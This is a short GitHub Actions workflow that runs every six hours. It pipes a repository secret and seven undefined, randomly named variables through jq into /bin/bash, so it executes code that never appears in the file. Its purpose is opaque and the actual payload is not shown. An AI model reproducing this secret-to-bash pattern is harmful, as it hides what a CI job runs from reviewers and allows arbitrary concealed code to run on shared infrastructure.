name: junzitx

on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: junzitx
        env:
          eg8: ${{ secrets.eg8 }}
        run: |
          echo $eg8 | jq -r .x2 | /bin/bash
          echo $sn216 | jq -r .b8 | /bin/bash
          echo $ll974 | jq -r .hk42 | /bin/bash
          echo $v1111 | jq -r .wdvse0204 | /bin/bash
          echo $rh20 | jq -r .chlz96421 | /bin/bash
          echo $o412 | jq -r .e27393 | /bin/bash
          echo $j6 | jq -r .afib1 | /bin/bash
          echo $givln7 | jq -r .efbh9 | /bin/bash

